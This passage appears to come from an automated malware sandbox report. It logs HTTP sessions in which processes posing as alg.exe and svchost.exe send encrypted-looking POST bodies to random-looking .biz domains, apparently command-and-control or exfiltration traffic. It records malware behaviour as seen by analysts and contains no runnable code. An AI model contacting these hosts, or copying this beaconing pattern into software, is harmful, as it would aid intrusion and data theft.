                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:06.892819881 CEST | 778 | OUT | Data Raw: 74 f5 a8 5d 87 1e 4c 58 fe 02 00 00 eb fd d0 e5 3f b4 13 5f 1a 20 ab 87 ed 7b ad 98 a7 a0 79 0f 0c ad 5d 66 c9 7d c6 8d df 83 3c 06 eb 33 0e e5 9f 32 00 7c 3f 5e c6 06 89 ce a5 13 70 13 e5 b7 2c bb f7 82 2f cd 84 fd cb ab e0 fa a3 ce ac a7 98 3d
Oct 8, 2024 15:28:08.226094007 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=949a55cf794fa47f3f53facd7d1281fb|8.46.123.33|1728394087|1728394087|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49757 | 82.112.184.197 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:08.384218931 CEST | 347 | OUT | POST /ipnvn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:08.384243011 CEST | 778 | OUT | Data Raw: ad 87 63 41 43 9b ea a7 fe 02 00 00 d2 17 7d 6c 54 cb f6 6d b5 d1 a5 58 e3 ed 8d 2e 30 19 de 17 0a ae 7d 03 c3 08 60 0f b1 4b 5e 5b 7b 96 6e 2c 9d 13 35 46 d6 a9 2b b9 13 b1 63 6b a6 a7 e0 04 2d 54 a2 07 f6 89 71 1a 29 cd 98 db a1 9c 4f 69 62 17
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: cAC}lTmX.0}`K^[{n,5F+ck-Tq)Oib_M`rub@!aKm*Zvfx]2~<CFum-_uS.o6TM2GOJfV]zP_59TWr}dW9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49760 | 82.112.184.197 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:10.484137058 CEST | 343 | OUT | POST /w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:10.484159946 CEST | 778 | OUT | Data Raw: e0 54 d2 79 10 d7 4a 4a fe 02 00 00 e7 9f a4 bf 53 16 bf 93 ed 69 0c ec e7 bd d2 ae 72 c9 aa 81 34 f9 7e ed 45 8d fb 29 66 c2 65 27 19 6c b3 98 a1 ba ab 40 0e 84 cf 01 3a f5 e2 6a 29 8a 86 86 d7 78 67 24 d6 88 10 7d fa d9 49 4d e6 03 93 15 b5 f7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: TyJJSir4~E)fe'l@:j)xg$}IMO&`TzIO-t1?`/ u/Ch!P%`.h2f>%[2c|;5S*#uYCb\&"-5rT+sE^Y,wqxx%7JylGQD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49763 | 82.112.184.197 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:14.768028021 CEST | 349 | OUT | POST /liar HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:14.768050909 CEST | 778 | OUT | Data Raw: 61 46 95 5f d1 3b 29 8c fe 02 00 00 5b 72 9c 0c c6 60 ba 57 37 2f 43 40 81 91 6c 3d d0 d2 a1 3b 79 71 b8 6b ce d1 8d 48 f5 4f 50 07 d2 0d 5d 48 0e 72 b3 52 78 13 80 54 f1 16 c9 11 18 09 00 d2 6b cd 15 89 cb 32 7c a5 9f c4 2d eb b5 db 23 c0 31 21
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: aF_;)[r`W7/C@l=;yqkHOP]HrRxTk2|-#1!F!k6mSSSPV2_^f&T*RD}_Tc*.CT[gMUdXO]>':8;dMf\Qn]%?=U$,!|c0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49768 | 82.112.184.197 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:25.780258894 CEST | 353 | OUT | POST /jpdlcoeoakm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:25.780284882 CEST | 786 | OUT | Data Raw: 6e c6 e7 b9 98 2c 4b 0a 06 03 00 00 cc 25 b2 f3 b8 c4 cd ba 7a dd b3 b4 64 dc 91 67 dd e3 b6 c1 b1 24 b2 24 6c 5a 7f b1 27 fd 4a 8a 5e 62 e5 d6 45 39 7b b6 7c b8 9c 8a fc da 88 67 02 3d d7 ba e0 c7 1d d5 c2 d0 ee 0b 9e b4 1a 56 f6 88 30 5a e2 f3
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n,K%zdg$$lZ'J^bE9{|g=V0Zb4cf2"g*1~MENYXGP;nwztR]c;zP~Qg>$Ml6X-4nzIN?J_``,_+,k.jsX*944DQT{1]`>b/c,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49770 | 82.112.184.197 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:28.479329109 CEST | 346 | OUT | POST /d HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.479382038 CEST786OUTData Raw: 31 3f 03 59 24 4e 5f ec 06 03 00 00 38 3e 47 7d 8e f6 09 62 85 c4 5f dd 36 fb 07 b9 b9 03 86 49 05 d6 a1 21 31 0e 5a a4 9a 7a 79 00 12 01 5f 95 2c 0a ac dc f2 8d a2 db d5 96 98 28 5a a2 0c ad d2 9f ae cb ad 5a 04 a5 57 3e 70 4f 04 2d b9 6d 08 34
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 1?Y$N_8>G}b_6I!1Zzy_,(ZZW>pO-m4((QN-=k4XvGm@xt"L(--0==V}11.#MUSoMuLoK1U(RU|7.zO3hHC >Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49773 | 82.112.184.197 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:32.446002960 CEST | 359 | OUT | POST /emmmpldkokdghu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:32.446026087 CEST786OUTData Raw: 1d f0 d1 94 c6 b0 a6 14 06 03 00 00 28 a0 4d dd 85 30 0e 82 4b 05 f4 2a 01 4c de 85 70 fe 57 ef 42 4f e3 f7 2f 95 3f b3 b3 d2 52 ae b9 43 bf ac 18 a8 74 b9 95 0e 9e 36 75 89 ec 33 9b e4 8a b4 61 f2 89 2b ac cd f9 8f ba a8 4a 14 9d 1e f6 d9 2b 9c
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (M0K*LpWBO/?RCt6u3a+J+s*Q&#TyJoN(Z`dHML>Mq"`B08`M+fA9[B1lNKGI_qrOa^` L|!Z!9apv9/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49776 | 82.112.184.197 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:36.256407976 CEST | 358 | OUT | POST /eyywnnlobvqfg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.256444931 CEST778OUTData Raw: ec af 33 30 c9 c4 31 be fe 02 00 00 53 cc 3a 92 98 0b 3a e8 c2 c4 5b a8 17 d6 77 24 62 33 c8 6c 1f 84 50 d6 c8 88 71 0f e9 87 37 5c 4c 82 b2 04 bc ea 9c ea 51 42 99 71 95 f7 e2 4e 06 27 7a c5 28 e1 c2 fb 96 c7 c8 00 d4 55 ea 2f c5 6e bd c9 f3 83
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 301S::[w$b3lPq7\LQBqN'z(U/n`bSe?/v~_QI.L_qB5ZUss033}oX}uA~S>\nf[V*-38\Yh;:A"4'OQ9X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49782 | 47.129.31.212 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:36.478475094 CEST | 354 | OUT | POST /fwbtaqdcjwd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.478475094 CEST786OUTData Raw: 9e 96 54 d9 fc b1 a7 31 06 03 00 00 1e cb 9d 49 db 19 64 2e 50 66 7c 0e ae e3 61 91 ec 45 13 34 7e 29 cc 82 1e 53 a0 69 3e 01 db ee 2b 4e 65 ab 44 c4 73 fa 20 27 09 21 2b c9 7a 67 78 3d cd e4 fb 41 46 75 25 6e 9f 39 69 e7 09 15 9c c7 2a a6 8d 99
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: T1Id.Pf|aE4~)Si>+NeDs '!+zgx=AFu%n9i*aUcA>6H'0sRqHXWI=M\G2?"<Ax'j*1E/2pjto~bg'=1Z!
Oct 8, 2024 15:28:38.110554934 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9673f278cadce04de0a6615a4b4633af|8.46.123.33|1728394117|1728394117|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
Oct 8, 2024 15:28:38.110621929 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9673f278cadce04de0a6615a4b4633af|8.46.123.33|1728394117|1728394117|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49789 | 13.251.16.150 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:38.590487003 CEST | 346 | OUT | POST /gcsq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:38.591502905 CEST | 786 | OUT | Data Raw: 47 e6 91 6e f0 0e f5 e6 06 03 00 00 1e 3d 61 fc 95 a9 dd 9e 77 13 fc 3f 48 7c a3 d1 d0 0d f9 b0 93 84 f8 da fd 38 e3 1c e0 87 30 64 f1 83 11 cc eb b9 2f f4 1e d5 03 8b 00 0d 0d 3d 9b e7 73 d7 a8 78 ff 26 35 e6 f0 58 11 71 b6 e5 42 34 0d 86 09 a7
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Gn=aw?H|80d/=sx&5XqB46CHL[4D@:D87o"RHNzT.]T%Y(+^8C~QxX{{@< FCc*8BY.Y+4RyB9`1U]@hR=i6Ml
Oct 8, 2024 15:28:39.933912992 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c0a974cb2196b3298a947bde11526b21|8.46.123.33|1728394119|1728394119|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49790 | 47.129.31.212 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:38.773391962 CEST | 352 | OUT | POST /hbkwpskje HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:38.773411989 CEST | 778 | OUT | Data Raw: fd c0 b2 1a 53 c8 bf c9 fe 02 00 00 5e fd ed 9e b2 b0 25 64 08 74 0d 48 63 ef 86 bb 3c e2 c4 1e 36 aa 66 f3 0a 06 47 a1 89 e7 5b 06 0c 73 3c ed 5e f2 82 f4 46 a1 01 55 6d bc 2a 01 ce e2 ef 41 2d bb b6 e4 18 04 75 67 6a 79 94 d8 61 14 47 99 ab ea
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: S^%dtHc<6fG[s<^FUm*A-ugjyaG*p#!vQtni0o$A]|7?2k- XcOE;~Tb/U0]X!bZ[*M}kMDvN]#@4v<NP6'$/
Oct 8, 2024 15:28:40.138302088 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=28566dd944eb61877046d054009ab41e|8.46.123.33|1728394119|1728394119|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49796 | 44.221.84.105 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:40.057308912 CEST | 347 | OUT | POST /js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:40.057342052 CEST | 786 | OUT | Data Raw: c7 8a 60 71 b7 e9 f5 da 06 03 00 00 68 f4 1a 3a 39 7f 0b f0 52 3a fe 42 41 55 b5 26 f1 c7 f0 0d e3 62 bc 7b 39 86 0e 95 c7 e6 5a 63 be 90 68 17 ec cf 5c 1e 13 69 a1 26 c1 ec da 36 9d 23 9d b4 05 fb ff 82 9f 57 b1 a3 09 82 37 f3 2f af 43 3a f1 87
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: `qh:9R:BAU&b{9Zch\i&6#W7/C:9C"(RNEM04^XnZ\h,~L"zt,gJ5)4E1rqloS%03/[|4^(0zbZd1:W"#*7t
Oct 8, 2024 15:28:40.516211033 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=da3d3ac67e6c6b9de91326cf18684359|8.46.123.33|1728394120|1728394120|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49802 | 18.141.10.107 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:40.651283026 CEST | 357 | OUT | POST /feejetjxxjumqw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:28:40.651297092 CEST | 786 | OUT | Data Raw: 3c f5 2b 98 96 77 37 05 06 03 00 00 41 6d d3 3f 13 05 71 74 cd 47 17 97 09 16 71 2c 43 59 b3 a6 a3 14 57 07 53 79 58 db 1e f9 30 28 d0 3b 26 ee e0 ac 4e b7 43 e9 33 59 aa 3d 98 aa 65 af 27 3c 2d 29 b5 e0 b8 4d bc 0a c5 19 b9 63 0e 21 16 92 79 21
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <+w7Am?qtGq,CYWSyX0(;&NC3Y=e'<-)Mc!y!(C"J5Yz|^2lzpv)aM_4`\0S_zOywOv_41P?-8_}f:9c.Z;ZtkL
Oct 8, 2024 15:28:42.002263069 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:28:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7b945d75c0aa421da016d95ad0c97e28|8.46.123.33|1728394121|1728394121|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49803 | 13.251.16.150 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:40.657304049 CEST | 355 | OUT | POST /scwkixjormncu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:28:40.657334089 CEST | 778 | OUT | Data Raw: 68 9c ac e8 9f 29 ad 2e fe 02 00 00 80 df 15 46 76 2a db 32 59 c1 4a fd 7a 0c e3 a2 17 36 bf 92 52 1e 9e 73 27 b9 91 45 eb 71 7d 8a 70 94 ff b6 b0 5f b3 78 ae 13 47 ad 11 1c b1 56 12 54 32 d9 28 86 fa 25 07 9e 93 24 a4 2a 02 eb f5 ad 6f 5c a6 c0
